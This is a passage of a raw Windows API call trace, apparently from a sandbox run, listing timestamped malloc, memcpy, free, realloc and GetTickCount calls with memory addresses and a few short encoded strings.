_Dst=0x24adf9b9488) returned 0x24adf9b9488 [0100.954] malloc (_Size=0x28) returned 0x24ae14808c0 [0100.954] memcpy (in: _Dst=0x24adf9bbb5a, _Src=0x24ae1a0f6cc, _Size=0xc | out: _Dst=0x24adf9bbb5a) returned 0x24adf9bbb5a [0100.954] memcpy (in: _Dst=0x24adf9bbb58, _Src=0x24adf9b9488, _Size=0x2 | out: _Dst=0x24adf9bbb58) returned 0x24adf9bbb58 [0100.955] free (_Block=0x24ae14808c0) [0100.955] malloc (_Size=0x70) returned 0x24ae146fca0 [0100.955] GetTickCount () returned 0x210d3a3 [0100.955] malloc (_Size=0x28) returned 0x24ae14808f0 [0100.955] malloc (_Size=0x28) returned 0x24ae1480a40 [0100.955] malloc (_Size=0x28) returned 0x24ae14807d0 [0100.956] malloc (_Size=0x28) returned 0x24ae1480800 [0100.963] malloc (_Size=0x28) returned 0x24ae1480b30 [0100.963] GetTickCount () returned 0x210d3b3 [0100.963] malloc (_Size=0x28) returned 0x24ae1480830 [0100.963] memcpy (in: _Dst=0x24adf9bb4d4, _Src=0x24adf9bbd78, _Size=0x2 | out: _Dst=0x24adf9bb4d4) returned 0x24adf9bb4d4 [0100.963] memcpy (in: _Dst=0x24adf9bb4d2, _Src=0x24adf9b9b28, _Size=0x2 | out: _Dst=0x24adf9bb4d2) returned 0x24adf9bb4d2 [0100.963] memcpy (in: _Dst=0x24adf9bb4d0, _Src=0x24adf9b99c8, _Size=0x2 | out: _Dst=0x24adf9bb4d0) returned 0x24adf9bb4d0 [0100.963] memcpy (in: _Dst=0x24adf9bb4ce, _Src=0x24adf9b94a8, _Size=0x2 | out: _Dst=0x24adf9bb4ce) returned 0x24adf9bb4ce [0100.963] memcpy (in: _Dst=0x24adf9bb4cc, _Src=0x24adf9b9908, _Size=0x2 | out: _Dst=0x24adf9bb4cc) returned 0x24adf9bb4cc [0100.963] memcpy (in: _Dst=0x24adf9bb4ca, _Src=0x24adf9b9568, _Size=0x2 | out: _Dst=0x24adf9bb4ca) returned 0x24adf9bb4ca [0100.963] memcpy (in: _Dst=0x24adf9bb4c8, _Src=0x24adf9b98c8, _Size=0x2 | out: _Dst=0x24adf9bb4c8) returned 0x24adf9bb4c8 [0100.964] free (_Block=0x24ae1480830) [0100.964] memcpy (in: _Dst=0x24adf9bc058, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc058) returned 0x24adf9bc058 [0100.964] malloc (_Size=0x28) returned 0x24ae1480a70 [0100.964] GetTickCount () returned 0x210d3b3 [0100.964] memcpy (in: _Dst=0x24adf9bb9ac, _Src=0x24adf9bc058, _Size=0x4 | out: _Dst=0x24adf9bb9ac) returned 0x24adf9bb9ac [0100.964] memcpy (in: _Dst=0x24adf9bb9a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb9a8) returned 0x24adf9bb9a8 [0100.965] free (_Block=0x24ae1480a70) [0100.965] GetTickCount () returned 0x210d3b3 [0100.965] memcpy (in: _Dst=0x24adf9bbef8, _Src=0x24adf9bb9ac, _Size=0x4 | out: _Dst=0x24adf9bbef8) returned 0x24adf9bbef8 [0100.965] malloc (_Size=0x28) returned 0x24ae1480860 [0100.965] GetTickCount () returned 0x210d3b3 [0100.965] GetTickCount () returned 0x210d3b3 [0100.965] GetTickCount () returned 0x210d3b3 [0100.965] memcpy (in: _Dst=0x24adf9bc178, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc178) returned 0x24adf9bc178 [0100.965] malloc (_Size=0x28) returned 0x24ae1480950 [0100.965] GetTickCount () returned 0x210d3b3 [0100.965] memcpy (in: _Dst=0x24adf9bba9c, _Src=0x24adf9bc178, _Size=0x4 | out: _Dst=0x24adf9bba9c) returned 0x24adf9bba9c [0100.965] memcpy (in: _Dst=0x24adf9bba98, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bba98) returned 0x24adf9bba98 [0100.966] free (_Block=0x24ae1480950) [0100.966] GetTickCount () returned 0x210d3b3 [0100.966] memcpy (in: _Dst=0x24adf9bc138, _Src=0x24adf9bba9c, _Size=0x4 | out: _Dst=0x24adf9bc138) returned 0x24adf9bc138 [0100.966] malloc (_Size=0x28) returned 0x24ae1480830 [0100.966] GetTickCount () returned 0x210d3b3 [0100.966] malloc (_Size=0x28) returned 0x24ae1480a10 [0100.966] GetTickCount () returned 0x210d3b3 [0100.966] GetTickCount () returned 0x210d3b3 [0100.966] GetTickCount () returned 0x210d3b3 [0100.966] memcpy (in: _Dst=0x24adf9bbdb8, _Src=0xd6788f9a50, _Size=0x2 | out: _Dst=0x24adf9bbdb8) returned 0x24adf9bbdb8 [0100.966] malloc (_Size=0x28) returned 0x24ae1480980 [0100.966] GetTickCount () returned 0x210d3b3 [0100.967] memcpy (in: _Dst=0x24adf9bc2bc, _Src=0x24adf9bbdb8, _Size=0x2 | out: _Dst=0x24adf9bc2bc) returned 0x24adf9bc2bc [0100.967] memcpy (in: _Dst=0x24adf9bc2b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bc2b8) returned 0x24adf9bc2b8 [0100.967] free (_Block=0x24ae1480980) [0100.967] GetTickCount () returned 0x210d3b3 [0100.967] memcpy (in: _Dst=0x24adf9bc258, _Src=0x24adf9bc2ba, _Size=0x4 | out: _Dst=0x24adf9bc258) returned 0x24adf9bc258 [0100.967] malloc (_Size=0x28) returned 0x24ae1480950 [0100.967] GetTickCount () returned 0x210d3b3 [0100.967] malloc (_Size=0x28) returned 0x24ae1480a70 [0100.967] GetTickCount () returned 0x210d3b3 [0100.967] GetTickCount () returned 0x210d3b3 [0100.967] GetTickCount () returned 0x210d3b3 [0100.968] memcpy (in: _Dst=0x24adf9bc098, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc098) returned 0x24adf9bc098 [0100.968] malloc (_Size=0x28) returned 0x24ae1480980 [0100.968] GetTickCount () returned 0x210d3b3 [0100.968] memcpy (in: _Dst=0x24adf9bbbec, _Src=0x24adf9bc098, _Size=0x4 | out: _Dst=0x24adf9bbbec) returned 0x24adf9bbbec [0100.968] memcpy (in: _Dst=0x24adf9bbbe8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bbbe8) returned 0x24adf9bbbe8 [0100.968] free (_Block=0x24ae1480980) [0100.968] GetTickCount () returned 0x210d3b3 [0100.968] memcpy (in: _Dst=0x24adf9bbd98, _Src=0x24adf9bbbec, _Size=0x4 | out: _Dst=0x24adf9bbd98) returned 0x24adf9bbd98 [0100.968] malloc (_Size=0x28) returned 0x24ae1480aa0 [0100.968] GetTickCount () returned 0x210d3b3 [0100.969] malloc (_Size=0x28) returned 0x24ae1480980 [0100.969] GetTickCount () returned 0x210d3b3 [0100.969] GetTickCount () returned 0x210d3b3 [0100.969] GetTickCount () returned 0x210d3b3 [0100.969] memcpy (in: _Dst=0x24adf9bc038, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc038) returned 0x24adf9bc038 [0100.969] malloc (_Size=0x28) returned 0x24ae1480890 [0100.969] GetTickCount () returned 0x210d3b3 [0100.969] memcpy (in: _Dst=0x24adf9bb7fc, _Src=0x24adf9bc038, _Size=0x4 | out: _Dst=0x24adf9bb7fc) returned 0x24adf9bb7fc [0100.969] memcpy (in: _Dst=0x24adf9bb7f8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bb7f8) returned 0x24adf9bb7f8 [0100.969] free (_Block=0x24ae1480890) [0100.969] GetTickCount () returned 0x210d3b3 [0100.970] memcpy (in: _Dst=0x24adf9bc3f8, _Src=0x24adf9bb7fc, _Size=0x4 | out: _Dst=0x24adf9bc3f8) returned 0x24adf9bc3f8 [0100.970] malloc (_Size=0x28) returned 0x24ae1480890 [0100.970] GetTickCount () returned 0x210d3b3 [0100.970] malloc (_Size=0x28) returned 0x24ae14808c0 [0100.970] GetTickCount () returned 0x210d3b3 [0100.970] GetTickCount () returned 0x210d3b3 [0100.970] GetTickCount () returned 0x210d3b3 [0100.970] memcpy (in: _Dst=0x24adf9bbcd8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbcd8) returned 0x24adf9bbcd8 [0100.970] malloc (_Size=0x28) returned 0x24ae1394bb0 [0100.970] GetTickCount () returned 0x210d3b3 [0100.970] memcpy (in: _Dst=0x24adf9bba0c, _Src=0x24adf9bbcd8, _Size=0x4 | out: _Dst=0x24adf9bba0c) returned 0x24adf9bba0c [0100.970] memcpy (in: _Dst=0x24adf9bba08, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9bba08) returned 0x24adf9bba08 [0100.971] free (_Block=0x24ae1394bb0) [0100.971] GetTickCount () returned 0x210d3b3 [0100.971] memcpy (in: _Dst=0x24adf9bc118, _Src=0x24adf9bba0c, _Size=0x4 | out: _Dst=0x24adf9bc118) returned 0x24adf9bc118 [0100.971] malloc (_Size=0x28) returned 0x24ae1394760 [0100.971] GetTickCount () returned 0x210d3b3 [0100.971] malloc (_Size=0x28) returned 0x24ae1394850 [0100.971] GetTickCount () returned 0x210d3b3 [0100.971] GetTickCount () returned 0x210d3b3 [0100.971] GetTickCount () returned 0x210d3b3 [0100.971] memcpy (in: _Dst=0x24adf9bbe98, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbe98) returned 0x24adf9bbe98 [0100.971] malloc (_Size=0x28) returned 0x24ae1394a30 [0100.971] GetTickCount () returned 0x210d3b3 [0100.972] free (_Block=0x24ae1394a30) [0100.972] GetTickCount () returned 0x210d3c2 [0100.972] malloc (_Size=0x28) returned 0x24ae13946a0 [0100.972] GetTickCount () returned 0x210d3c2 [0100.972] malloc (_Size=0x28) returned 0x24ae1394af0 [0100.973] GetTickCount () returned 0x210d3c2 [0100.973] free (_Block=0x24ae1394af0) [0100.973] SysStringLen (param_1="%c3%ab%03%c3%9d%c2%a3") returned 0x15 [0100.973] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae5e0 [0100.974] GetTickCount () returned 0x210d3c2 [0100.974] free (_Block=0x24ae13ae5e0) [0100.974] GetTickCount () returned 0x210d3c2 [0100.974] malloc (_Size=0x2e0) returned 0x24ae13906b0 [0100.974] malloc (_Size=0x20) returned 0x24ae1394700 [0100.974] malloc (_Size=0x288) returned 0x24ae148d080 [0100.974] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139d390 [0100.974] GetTickCount () returned 0x210d3c2 [0100.974] realloc (_Block=0x24ae1394700, _Size=0x40) returned 0x24ae146c320 [0100.974] realloc (_Block=0x24ae139d390, _Size=0x280) returned 0x24ae148d310 [0100.975] GetTickCount () returned 0x210d3c2 [0100.975] malloc (_Size=0x508) returned 0x24ae1488350 [0100.975] GetTickCount () returned 0x210d3c2 [0100.975] realloc (_Block=0x24ae146c320, _Size=0x80) returned 0x24ae13ae5e0 [0100.975] realloc (_Block=0x24ae148d310, _Size=0x500) returned 0x24ae1487e40 [0100.975] GetTickCount () returned 0x210d3c2 [0100.975] GetTickCount () returned 0x210d3c2 [0100.975] malloc (_Size=0xa08) returned 0x24ae13b5be0 [0100.975] GetTickCount () returned 0x210d3c2 [0100.975] realloc (_Block=0x24ae13ae5e0, _Size=0x100) returned 0x24ae1480630 [0100.975] GetTickCount () returned 0x210d3c2 [0100.976] realloc (_Block=0x24ae1487e40, _Size=0xa00) returned 0x24ae13b65f0 [0100.976] GetTickCount () returned 0x210d3c2 [0100.976] GetTickCount () returned 0x210d3c2 [0100.976] GetTickCount () returned 0x210d3c2 [0100.976] GetTickCount () returned 0x210d3c2 [0100.976] malloc (_Size=0x1408) returned 0x24ae13a2af0 [0100.976] GetTickCount () returned 0x210d3c2 [0100.976] realloc (_Block=0x24ae1480630, _Size=0x200) returned 0x24ae148aea0 [0100.976] GetTickCount () returned 0x210d3c2 [0100.976] GetTickCount () returned 0x210d3c2 [0100.976] GetTickCount () returned 0x210d3c2 [0100.976] realloc (_Block=0x24ae13b65f0, _Size=0x1400) returned 0x24ae1397fc0 [0100.977] GetTickCount () returned 0x210d3c2 [0100.977] GetTickCount () returned 0x210d3c2 [0100.977] GetTickCount () returned 0x210d3c2 [0100.977] GetTickCount () returned 0x210d3c2 [0100.977] GetTickCount () returned 0x210d3c2 [0100.977] GetTickCount () returned 0x210d3c2 [0100.977] GetTickCount () returned 0x210d3c2 [0100.977] GetTickCount () returned 0x210d3c2 [0100.977] malloc (_Size=0x2808) returned 0x24ae13993d0 [0100.977] GetTickCount () returned 0x210d3c2 [0100.980] GetTickCount () returned 0x210d3c2 [0100.983] GetTickCount () returned 0x210d3c2 [0100.985] GetTickCount () returned 0x210d3c2 [0100.988] GetTickCount () returned 0x210d3d2 [0100.990] GetTickCount () returned 0x210d3d2 [0100.992] GetTickCount () returned 0x210d3d2 [0100.993] GetTickCount () returned 0x210d3d2 [0100.995] GetTickCount () returned 0x210d3d2 [0100.997] GetTickCount () returned 0x210d3d2 [0100.999] GetTickCount () returned 0x210d3d2 [0101.001] GetTickCount () returned 0x210d3d2 [0101.002] malloc (_Size=0x28) returned 0x24ae1394bb0 [0101.002] GetTickCount () returned 0x210d3d2 [0101.002] malloc (_Size=0x28) returned 0x24ae1394880 [0101.002] GetTickCount () returned 0x210d3d2 [0101.002] malloc (_Size=0x28) returned 0x24ae1394c40 [0101.098] GetTickCount () returned 0x210d43f [0101.098] memcpy (in: _Dst=0x24adf9b9d2e, _Src=0x24adf9bc1b8, _Size=0x2 | out: _Dst=0x24adf9b9d2e) returned 0x24adf9b9d2e [0101.098] memcpy (in: _Dst=0x24adf9b9d2c, _Src=0x24adf9bc018, _Size=0x2 | out: _Dst=0x24adf9b9d2c) returned 0x24adf9b9d2c [0101.098] memcpy (in: _Dst=0x24adf9b9d2a, _Src=0x24adf9bc078, _Size=0x2 | out: _Dst=0x24adf9b9d2a) returned 0x24adf9b9d2a [0101.098] memcpy (in: _Dst=0x24adf9b9d28, _Src=0x24adf9bbe78, _Size=0x2 | out: _Dst=0x24adf9b9d28) returned 0x24adf9b9d28 [0101.099] free (_Block=0x24ae1394c40) [0101.099] GetTickCount () returned 0x210d43f [0101.100] memcpy (in: _Dst=0x24adf9bc158, _Src=0xd6788fbb30, _Size=0x4 | out: _Dst=0x24adf9bc158) returned 0x24adf9bc158 [0101.100] malloc (_Size=0x28) returned 0x24ae1394af0 [0101.100] GetTickCount () returned 0x210d43f [0101.100] memcpy (in: _Dst=0x24adf9b9c3c, _Src=0x24ae1a0f6cc, _Size=0xc | out: _Dst=0x24adf9b9c3c) returned 0x24adf9b9c3c [0101.100] memcpy (in: _Dst=0x24adf9b9c38, _Src=0x24adf9bc158, _Size=0x4 | out: _Dst=0x24adf9b9c38) returned 0x24adf9b9c38 [0101.100] free (_Block=0x24ae1394af0) [0101.101] malloc (_Size=0x70) returned 0x24ae14705a0 [0101.101] GetTickCount () returned 0x210d43f [0101.101] GetTickCount () returned 0x210d43f [0101.101] malloc (_Size=0x28) returned 0x24ae13948b0 [0101.101] GetTickCount () returned 0x210d43f [0101.102] malloc (_Size=0x28) returned 0x24ae1394c10 [0101.102] GetTickCount () returned 0x210d43f [0101.102] malloc (_Size=0x28) returned 0x24ae1394c40 [0101.102] GetTickCount () returned 0x210d43f [0101.102] malloc (_Size=0x28) returned 0x24ae1394790 [0101.102] GetTickCount () returned 0x210d43f [0101.103] malloc (_Size=0x28) returned 0x24ae1394c70 [0101.103] GetTickCount () returned 0x210d43f [0101.103] memcpy (in: _Dst=0x24adf9ba122, _Src=0x24adf9bbf38, _Size=0x2 | out: _Dst=0x24adf9ba122) returned 0x24adf9ba122 [0101.103] memcpy (in: _Dst=0x24adf9ba120, _Src=0x24adf9bc0d8, _Size=0x2 | out: _Dst=0x24adf9ba120) returned 0x24adf9ba120 [0101.103] memcpy (in: _Dst=0x24adf9ba11e, _Src=0x24adf9bc0f8, _Size=0x2 | out: _Dst=0x24adf9ba11e) returned 0x24adf9ba11e [0101.103] memcpy (in: _Dst=0x24adf9ba11c, _Src=0x24adf9bc0b8, _Size=0x2 | out: _Dst=0x24adf9ba11c) returned 0x24adf9ba11c [0101.103] memcpy (in: _Dst=0x24adf9ba11a, _Src=0x24adf9bbed8, _Size=0x2 | out: _Dst=0x24adf9ba11a) returned 0x24adf9ba11a [0101.103] memcpy (in: _Dst=0x24adf9ba118, _Src=0x24adf9bc2d8, _Size=0x2 | out: _Dst=0x24adf9ba118) returned 0x24adf9ba118 [0101.104] free (_Block=0x24ae1394c70) [0101.104] GetTickCount () returned 0x210d43f [0101.104] GetTickCount () returned 0x210d43f [0101.104] memcpy (in: _Dst=0x24adf9bc278, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc278) returned 0x24adf9bc278 [0101.104] malloc (_Size=0x28) returned 0x24ae1394670 [0101.104] GetTickCount () returned 0x210d43f [0101.105] memcpy (in: _Dst=0x24adf9b9edc, _Src=0x24adf9bc278, _Size=0x4 | out: _Dst=0x24adf9b9edc) returned 0x24adf9b9edc [0101.105] memcpy (in: _Dst=0x24adf9b9ed8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9ed8) returned 0x24adf9b9ed8 [0101.105] free (_Block=0x24ae1394670) [0101.105] GetTickCount () returned 0x210d43f [0101.105] memcpy (in: _Dst=0x24adf9bbff8, _Src=0x24adf9b9edc, _Size=0x4 | out: _Dst=0x24adf9bbff8) returned 0x24adf9bbff8 [0101.105] malloc (_Size=0x28) returned 0x24ae1394ac0 [0101.106] GetTickCount () returned 0x210d43f [0101.106] GetTickCount () returned 0x210d43f [0101.106] GetTickCount () returned 0x210d43f [0101.106] memcpy (in: _Dst=0x24adf9bbc98, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbc98) returned 0x24adf9bbc98 [0101.106] malloc (_Size=0x28) returned 0x24ae13947f0 [0101.106] GetTickCount () returned 0x210d43f [0101.106] memcpy (in: _Dst=0x24adf9ba35c, _Src=0x24adf9bbc98, _Size=0x4 | out: _Dst=0x24adf9ba35c) returned 0x24adf9ba35c [0101.106] memcpy (in: _Dst=0x24adf9ba358, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba358) returned 0x24adf9ba358 [0101.107] free (_Block=0x24ae13947f0) [0101.107] GetTickCount () returned 0x210d43f [0101.107] memcpy (in: _Dst=0x24adf9bc238, _Src=0x24adf9ba35c, _Size=0x4 | out: _Dst=0x24adf9bc238) returned 0x24adf9bc238 [0101.107] malloc (_Size=0x28) returned 0x24ae1394970 [0101.107] GetTickCount () returned 0x210d43f [0101.107] malloc (_Size=0x28) returned 0x24ae1394d30 [0101.107] GetTickCount () returned 0x210d43f [0101.108] GetTickCount () returned 0x210d43f [0101.108] GetTickCount () returned 0x210d43f [0101.108] memcpy (in: _Dst=0x24adf9bbcf8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbcf8) returned 0x24adf9bbcf8 [0101.108] malloc (_Size=0x28) returned 0x24ae13948e0 [0101.108] GetTickCount () returned 0x210d43f [0101.108] memcpy (in: _Dst=0x24adf9b9c9c, _Src=0x24adf9bbcf8, _Size=0x4 | out: _Dst=0x24adf9b9c9c) returned 0x24adf9b9c9c [0101.108] memcpy (in: _Dst=0x24adf9b9c98, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9c98) returned 0x24adf9b9c98 [0101.109] free (_Block=0x24ae13948e0) [0101.109] GetTickCount () returned 0x210d43f [0101.109] memcpy (in: _Dst=0x24adf9bbf78, _Src=0x24adf9b9c9c, _Size=0x4 | out: _Dst=0x24adf9bbf78) returned 0x24adf9bbf78 [0101.109] malloc (_Size=0x28) returned 0x24ae13948e0 [0101.109] GetTickCount () returned 0x210d43f [0101.109] malloc (_Size=0x28) returned 0x24ae13946d0 [0101.109] GetTickCount () returned 0x210d43f [0101.109] GetTickCount () returned 0x210d43f [0101.109] GetTickCount () returned 0x210d43f [0101.110] GetTickCount () returned 0x210d43f [0101.110] memcpy (in: _Dst=0x24adf9bc2f8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc2f8) returned 0x24adf9bc2f8 [0101.110] malloc (_Size=0x28) returned 0x24ae1394820 [0101.110] GetTickCount () returned 0x210d43f [0101.110] memcpy (in: _Dst=0x24adf9b9d8c, _Src=0x24adf9bc2f8, _Size=0x4 | out: _Dst=0x24adf9b9d8c) returned 0x24adf9b9d8c [0101.110] memcpy (in: _Dst=0x24adf9b9d88, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9d88) returned 0x24adf9b9d88 [0101.111] free (_Block=0x24ae1394820) [0101.111] GetTickCount () returned 0x210d43f [0101.111] memcpy (in: _Dst=0x24adf9bc3b8, _Src=0x24adf9b9d8c, _Size=0x4 | out: _Dst=0x24adf9bc3b8) returned 0x24adf9bc3b8 [0101.111] malloc (_Size=0x28) returned 0x24ae1394ca0 [0101.111] GetTickCount () returned 0x210d43f [0101.111] malloc (_Size=0x28) returned 0x24ae1394910 [0101.111] GetTickCount () returned 0x210d43f [0101.111] GetTickCount () returned 0x210d43f [0101.111] GetTickCount () returned 0x210d43f [0101.112] memcpy (in: _Dst=0x24adf9bbdf8, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bbdf8) returned 0x24adf9bbdf8 [0101.112] malloc (_Size=0x28) returned 0x24ae1394df0 [0101.112] GetTickCount () returned 0x210d43f [0101.112] memcpy (in: _Dst=0x24adf9b9c6c, _Src=0x24adf9bbdf8, _Size=0x4 | out: _Dst=0x24adf9b9c6c) returned 0x24adf9b9c6c [0101.112] memcpy (in: _Dst=0x24adf9b9c68, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9c68) returned 0x24adf9b9c68 [0101.113] free (_Block=0x24ae1394df0) [0101.113] GetTickCount () returned 0x210d44f [0101.113] memcpy (in: _Dst=0x24adf9bc298, _Src=0x24adf9b9c6c, _Size=0x4 | out: _Dst=0x24adf9bc298) returned 0x24adf9bc298 [0101.113] malloc (_Size=0x28) returned 0x24ae1394af0 [0101.113] GetTickCount () returned 0x210d44f [0101.113] malloc (_Size=0x28) returned 0x24ae1394df0 [0101.113] GetTickCount () returned 0x210d44f [0101.113] GetTickCount () returned 0x210d44f [0101.114] GetTickCount () returned 0x210d44f [0101.114] memcpy (in: _Dst=0x24adf9bc338, _Src=0xd6788f9a50, _Size=0x4 | out: _Dst=0x24adf9bc338) returned 0x24adf9bc338 [0101.114] malloc (_Size=0x28) returned 0x24ae1394cd0 [0101.114] GetTickCount () returned 0x210d44f [0101.114] memcpy (in: _Dst=0x24adf9b9ccc, _Src=0x24adf9bc338, _Size=0x4 | out: _Dst=0x24adf9b9ccc) returned 0x24adf9b9ccc [0101.114] memcpy (in: _Dst=0x24adf9b9cc8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9cc8) returned 0x24adf9b9cc8 [0101.116] free (_Block=0x24ae1394cd0) [0101.116] GetTickCount () returned 0x210d44f [0101.116] memcpy (in: _Dst=0x24adf9bc358, _Src=0x24adf9b9ccc, _Size=0x4 | out: _Dst=0x24adf9bc358) returned 0x24adf9bc358 [0101.116] malloc (_Size=0x28) returned 0x24ae1394940 [0101.116] GetTickCount () returned 0x210d44f [0101.116] malloc (_Size=0x28) returned 0x24ae1394b80 [0101.116] GetTickCount () returned 0x210d44f [0101.117] memcpy (in: _Dst=0x24adf9a5ec8, _Src=0x24adf9bc358, _Size=0x4 | out: _Dst=0x24adf9a5ec8) returned 0x24adf9a5ec8 [0101.117] memcpy (in: _Dst=0x24adf9a5ec6, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ec6) returned 0x24adf9a5ec6 [0101.117] memcpy (in: _Dst=0x24adf9a5ec2, _Src=0x24adf9bc298, _Size=0x4 | out: _Dst=0x24adf9a5ec2) returned 0x24adf9a5ec2 [0101.117] memcpy (in: _Dst=0x24adf9a5ec0, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ec0) returned 0x24adf9a5ec0 [0101.117] memcpy (in: _Dst=0x24adf9a5ebc, _Src=0x24adf9bc3b8, _Size=0x4 | out: _Dst=0x24adf9a5ebc) returned 0x24adf9a5ebc [0101.117] memcpy (in: _Dst=0x24adf9a5eba, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eba) returned 0x24adf9a5eba [0101.117] memcpy (in: _Dst=0x24adf9a5eb6, _Src=0x24adf9bbf78, _Size=0x4 | out: _Dst=0x24adf9a5eb6) returned 0x24adf9a5eb6 [0101.117] memcpy (in: _Dst=0x24adf9a5eb4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eb4) returned 0x24adf9a5eb4 [0101.117] memcpy (in: _Dst=0x24adf9a5eb0, _Src=0x24adf9bc238, _Size=0x4 | out: _Dst=0x24adf9a5eb0) returned 0x24adf9a5eb0 [0101.117] memcpy (in: _Dst=0x24adf9a5eae, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eae) returned 0x24adf9a5eae [0101.117] memcpy (in: _Dst=0x24adf9a5eaa, _Src=0x24adf9bbff8, _Size=0x4 | out: _Dst=0x24adf9a5eaa) returned 0x24adf9a5eaa [0101.117] memcpy (in: _Dst=0x24adf9a5ea8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ea8) returned 0x24adf9a5ea8 [0101.118] free (_Block=0x24ae1394b80) [0101.118] SysStringLen (param_1="%c2%af%c2%9c%2f%7e") returned 0x12 [0101.118] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13ae5e0 [0101.119] GetTickCount () returned 0x210d44f [0101.119] memcpy (in: _Dst=0x24adf9ba178, _Src=0x24ae13ae5e0, _Size=0x8 | out: _Dst=0x24adf9ba178) returned 0x24adf9ba178 [0101.119] free (_Block=0x24ae13ae5e0) [0101.119] malloc (_Size=0x2e0) returned 0x24ae13909a0 [0101.119] GetTickCount () returned 0x210d44f [0101.120] GetTickCount () returned 0x210d44f [0101.120] malloc (_Size=0x20) returned 0x24ae1394be0 [0101.120] malloc (_Size=0x288) returned 0x24ae148e500 [0101.120] realloc (_Block=0x0, _Size=0x140) returned 0x24ae139c670 [0101.120] realloc (_Block=0x24ae1394be0, _Size=0x40) returned 0x24ae146c320 [0101.120] GetTickCount () returned 0x210d44f [0101.120] realloc (_Block=0x24ae139c670, _Size=0x280) returned 0x24ae148dfe0 [0101.120] malloc (_Size=0x508) returned 0x24ae1485fe0 [0101.120] GetTickCount () returned 0x210d44f [0101.120] realloc (_Block=0x24ae146c320, _Size=0x80) returned 0x24ae13a3f00 [0101.121] GetTickCount () returned 0x210d44f [0101.121] realloc (_Block=0x24ae148dfe0, _Size=0x500) returned 0x24ae1487420 [0101.121] GetTickCount () returned 0x210d44f [0101.121] malloc (_Size=0xa08) returned 0x24ae13b0150 [0101.121] GetTickCount () returned 0x210d44f [0101.121] realloc (_Block=0x24ae13a3f00, _Size=0x100) returned 0x24ae1480630 [0101.121] GetTickCount () returned 0x210d44f [0101.121] realloc (_Block=0x24ae1487420, _Size=0xa00) returned 0x24ae13b1f80 [0101.121] GetTickCount () returned 0x210d44f [0101.121] GetTickCount () returned 0x210d44f [0101.122] GetTickCount () returned 0x210d44f [0101.122] GetTickCount () returned 0x210d44f [0101.122] malloc (_Size=0x1408) returned 0x24ae13b7700 [0101.122] GetTickCount () returned 0x210d44f [0101.122] realloc (_Block=0x24ae1480630, _Size=0x200) returned 0x24ae148b0b0 [0101.122] GetTickCount () returned 0x210d44f [0101.122] GetTickCount () returned 0x210d44f [0101.122] GetTickCount () returned 0x210d44f [0101.122] realloc (_Block=0x24ae13b1f80, _Size=0x1400) returned 0x24ae13b8b10 [0101.122] malloc (_Size=0x2808) returned 0x24ae13b9f20 [0101.123] malloc (_Size=0x28) returned 0x24ae1394b20 [0101.123] GetTickCount () returned 0x210d44f [0101.123] malloc (_Size=0x28) returned 0x24ae1394c70 [0101.124] GetTickCount () returned 0x210d44f [0101.124] malloc (_Size=0x28) returned 0x24ae13949a0 [0101.124] GetTickCount () returned 0x210d44f [0101.124] malloc (_Size=0x808) returned 0x24ae13a4910 [0101.124] realloc (_Block=0x24ae147ef20, _Size=0x140) returned 0x24ae139cd00 [0101.124] memcpy (in: _Dst=0x24ae13a4958, _Src=0x24adf9b9c38, _Size=0x12 | out: _Dst=0x24ae13a4958) returned 0x24ae13a4958 [0101.124] memcpy (in: _Dst=0x24adf9b9d5e, _Src=0x24adf9bc398, _Size=0x2 | out: _Dst=0x24adf9b9d5e) returned 0x24adf9b9d5e [0101.124] memcpy (in: _Dst=0x24adf9b9d5c, _Src=0x24adf9bbf98, _Size=0x2 | out: _Dst=0x24adf9b9d5c) returned 0x24adf9b9d5c [0101.124] memcpy (in: _Dst=0x24adf9b9d5a, _Src=0x24adf9bc378, _Size=0x2 | out: _Dst=0x24adf9b9d5a) returned 0x24adf9b9d5a [0101.124] memcpy (in: _Dst=0x24adf9b9d58, _Src=0x24adf9bbd38, _Size=0x2 | out: _Dst=0x24adf9b9d58) returned 0x24adf9b9d58 [0101.125] free (_Block=0x24ae13949a0) [0101.125] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ü", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0101.125] GetTickCount () returned 0x210d44f [0101.125] memcpy (in: _Dst=0x24adf9bbcb8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bbcb8) returned 0x24adf9bbcb8 [0101.125] malloc (_Size=0x28) returned 0x24ae1394be0 